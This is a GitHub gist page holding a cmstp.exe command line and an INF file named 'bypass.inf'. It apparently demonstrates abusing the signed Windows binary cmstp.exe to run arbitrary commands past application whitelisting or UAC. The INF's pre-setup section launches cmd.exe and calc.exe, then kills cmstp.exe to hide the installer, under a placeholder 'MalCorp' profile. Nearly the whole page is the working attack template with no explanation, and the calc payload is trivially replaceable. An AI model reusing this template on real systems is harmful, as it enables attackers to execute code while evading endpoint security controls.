Created
June 16, 2026 17:49
-
-
Save derekxmartin/f6c564a5c15551052a8eec5bc68aea12 to your computer and use it in GitHub Desktop.
cmstp.exe
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| cmstp.exe /s "C:\Users\derek\Desktop\bypass.inf" /au | |
| [version] | |
| Signature=$chicago$ | |
| AdvancedINF=2.5 | |
| [DefaultInstall] | |
| RunPreSetupCommands=RunPreSetupCommandsSection | |
| ;CopyFiles=Xnstall.CopyFiles, Xnstall.CopyFiles.ICM | |
| ;AddReg=Xnstall.AddReg.AllUsers | |
| RegisterOCXs=RegisterOCXSection | |
| [RunPreSetupCommandsSection] | |
| ; Commands Here will be run Before Setup Begins to install | |
| c:\windows\system32\cmd.exe | |
| calc.exe | |
| taskkill /IM cmstp.exe /F | |
| [Strings] | |
| ServiceName="MalCorp" | |
| ShortSvcName="malcorp" | |
| DesktopGUID="{BC63D377-66BA-4935-BAD4-DD402D23A85A}" | |
| UninstallAppTitle="MalCorp" | |
| DesktopIcon="" | |
| PhonebookPath="" | |
| BeginPrompt="Do you want to remove MalCorp?" | |
| EndPrompt="Successfully removed MalCorp." | |
| DisplayLCID=1033 | |
| CmLCID=1033 |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment